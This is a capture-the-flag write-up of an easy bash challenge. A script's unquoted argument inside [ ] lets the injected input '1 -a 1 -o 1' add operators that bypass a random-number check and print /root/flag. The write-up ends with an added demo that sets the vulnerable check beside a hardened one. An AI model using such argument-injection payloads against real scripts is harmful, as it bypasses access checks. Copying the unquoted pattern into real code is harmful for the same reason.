Writeup of an interesting shell script
Difficulty: Easy
Source code
#!/bin/bash
PATH=/usr/bin
CHALLENGE=$RANDOM$RANDOM$RANDOM
[ -n "$1" ] || exit 1
[ $1 -eq "$CHALLENGE" ] && cat /root/flag
echo "Goodbye!"
Code analysis
The script first pins PATH to /usr/bin, then builds CHALLENGE by concatenating three $RANDOM values. It then looks at the first argument: if it is empty the script exits immediately; otherwise the argument is compared with the random number using -eq, and the flag is printed when they are equal. Note that -n only tests that the argument is non-empty, not that it is a number, so any non-empty input reaches the -eq comparison.
Solution
I did not manage this on my own at first, but I went and read the writeup. Here I learned two things: first, bash -x lets you debug your script so you can see how it actually runs; second, [ and test are both the conditional test command, so we can look at test to get the corresponding operator hints.
( EXPRESSION )
EXPRESSION is true
! EXPRESSION
EXPRESSION is false
EXPRESSION1 -a EXPRESSION2
both EXPRESSION1 and EXPRESSION2 are true
EXPRESSION1 -o EXPRESSION2
either EXPRESSION1 or EXPRESSION2 is true
-n STRING
the length of STRING is nonzero
STRING equivalent to -n STRING
-z STRING
the length of STRING is zero
STRING1 = STRING2
the strings are equal
STRING1 != STRING2
the strings are not equal
INTEGER1 -eq INTEGER2
INTEGER1 is equal to INTEGER2
INTEGER1 -ge INTEGER2
INTEGER1 is greater than or equal to INTEGER2
INTEGER1 -gt INTEGER2
INTEGER1 is greater than INTEGER2
INTEGER1 -le INTEGER2
INTEGER1 is less than or equal to INTEGER2
INTEGER1 -lt INTEGER2
INTEGER1 is less than INTEGER2
INTEGER1 -ne INTEGER2
INTEGER1 is not equal to INTEGER2
FILE1 -ef FILE2
FILE1 and FILE2 have the same device and inode numbers
FILE1 -nt FILE2
FILE1 is newer (modification date) than FILE2
FILE1 -ot FILE2
FILE1 is older than FILE2
-b FILE
FILE exists and is block special
-c FILE
FILE exists and is character special
-d FILE
FILE exists and is a directory
-e FILE
FILE exists
-f FILE
FILE exists and is a regular file
-g FILE
FILE exists and is set-group-ID
-G FILE
FILE exists and is owned by the effective group ID
-h FILE
FILE exists and is a symbolic link (same as -L)
-k FILE
FILE exists and has its sticky bit set
-L FILE
FILE exists and is a symbolic link (same as -h)
-N FILE
FILE exists and has been modified since it was last read
-O FILE
FILE exists and is owned by the effective user ID
-p FILE
FILE exists and is a named pipe
-r FILE
FILE exists and the user has read access
-s FILE
FILE exists and has a size greater than zero
-S FILE
FILE exists and is a socket
-t FD
file descriptor FD is opened on a terminal
-u FILE
FILE exists and its set-user-ID bit is set
-w FILE
FILE exists and the user has write access
-x FILE
FILE exists and the user has execute (or search) access
Except for -h and -L, all FILE-related tests dereference symbolic links. Beware that parentheses need to be escaped (e.g., by backslashes) for shells. INTEGER may also be -l STRING, which evaluates to the length of STRING.
NOTE: Binary -a and -o are inherently ambiguous. Use 'test EXPR1 && test EXPR2' or 'test EXPR1 || test EXPR2' instead.
NOTE: [ honors the --help and --version options, but test does not. test treats each of those as it treats any other nonempty STRING.
NOTE: your shell may have its own version of test and/or [, which usually supersedes the version described here. Please refer to your shell's documentation for details about the options it supports.
The operators used here are -a and -o. EXPRESSION1 -a EXPRESSION2 is true only when both expressions are true; EXPRESSION1 -o EXPRESSION2 is true when either one is. (Do not confuse the binary -o with the unary -O FILE, which tests whether a file is owned by the effective user ID; only the logical OR is relevant here.)
root@LingMj:/home/lingmj/xxoo# bash -x ./rand.sh '1'
+ PATH=/usr/bin
+ CHALLENGE=102993051618196
+ '[' -n 1 ']'
+ '[' 1 -eq 102993051618196 ']'
+ echo 'Goodbye!'
Goodbye!
Here we see the comparison that is performed after we enter 1.
root@LingMj:/home/lingmj/xxoo# bash -x ./rand.sh '1 -a 1'
+ PATH=/usr/bin
+ CHALLENGE=1057301544146
+ '[' -n '1 -a 1' ']'
+ '[' 1 -a 1 -eq 1057301544146 ']'
+ echo 'Goodbye!'
Goodbye!
Because $1 is not quoted, the shell word-splits our argument before [ sees it, so everything we typed becomes separate operands of the test. Much like an SQL injection, we can tack our own condition onto the expression so that the original comparison no longer decides the result. In the trace above this did not work yet: -a binds tighter than -o, so [ 1 -a 1 -eq 1057301544146 ] is parsed as 1 -a (1 -eq 1057301544146), and the failing -eq still makes the whole expression false. -o is the logical OR operator: as soon as the condition in front of it is true, the whole expression is true.
root@LingMj:/home/lingmj/xxoo# bash -x ./rand.sh '1 -a 1 -o 1'
+ PATH=/usr/bin
+ CHALLENGE=262342765225395
+ '[' -n '1 -a 1 -o 1' ']'
+ '[' 1 -a 1 -o 1 -eq 262342765225395 ']'
+ cat /root/flag
hmv{hhhhhh}
+ echo 'Goodbye!'
Goodbye!
The trace shows why this one succeeds: [ 1 -a 1 -o 1 -eq 262342765225395 ] is parsed as (1 -a 1) -o (1 -eq 262342765225395). The left side is a pair of non-empty strings and is therefore true, so the whole test is true no matter what CHALLENGE is, and cat /root/flag runs (we are root in this session, so the file is readable). All in all this script was a lot of fun to work through; thanks to the group owner for providing the challenge!
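As an added example (not code from the original post), the following script reproduces the unquoted-[ injection from the writeup next to a hardened version of the same check, and runs a few payloads through both. CHALLENGE is a constructed, fixed value here so the results are reproducible; the challenge script itself uses $RANDOM$RANDOM$RANDOM.

```bash
#!/bin/bash
# Added example, not part of the original writeup. CHALLENGE is a constructed
# constant so that every run gives the same result.
CHALLENGE=102993051618196

# Vulnerable: $1 is unquoted, so an argument such as '1 -o 1' is word-split
# into three operands and [ evaluates "1 -o (1 -eq $CHALLENGE)".
# Returns 0 when the flag would be printed, 1 otherwise.
vuln_check() {
    [ -n "$1" ] || return 1
    [ $1 -eq "$CHALLENGE" ] 2>/dev/null && return 0
    return 1
}

# Hardened: quote the expansion so the whole argument stays a single operand,
# and accept only a string of decimal digits before ever calling -eq
# (with a non-integer operand, [ prints an error and returns 2).
safe_check() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;   # empty or contains a non-digit: reject
    esac
    [ "$1" -eq "$CHALLENGE" ] && return 0
    return 1
}

# Run a set of payloads through both checks and report which ones pass.
# Prints one line per payload: "payload|vuln|safe", e.g. "1 -o 1|pass|fail".
demo() {
    for payload in "1" "1 -a 1" "1 -o 1" "1 -a 1 -o 1" "$CHALLENGE"; do
        v=fail; s=fail
        vuln_check "$payload" && v=pass
        safe_check "$payload" && s=pass
        printf '%s|%s|%s\n' "$payload" "$v" "$s"
    done
}

demo
```

The shorter payload '1 -o 1' is enough on its own: [ 1 -o 1 -eq 102993051618196 ] is true because the left operand is a non-empty string. Note that switching the script to [[ $1 -eq $CHALLENGE ]] is not a fix either: inside [[ ]] the operands of -eq are evaluated as arithmetic expressions, so passing the literal string CHALLENGE (the variable's own name) compares equal to its value. Quoting the expansion and validating that the input is a plain integer, as safe_check does, closes both holes.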
This post is licensed under CC BY 4.0 by the author.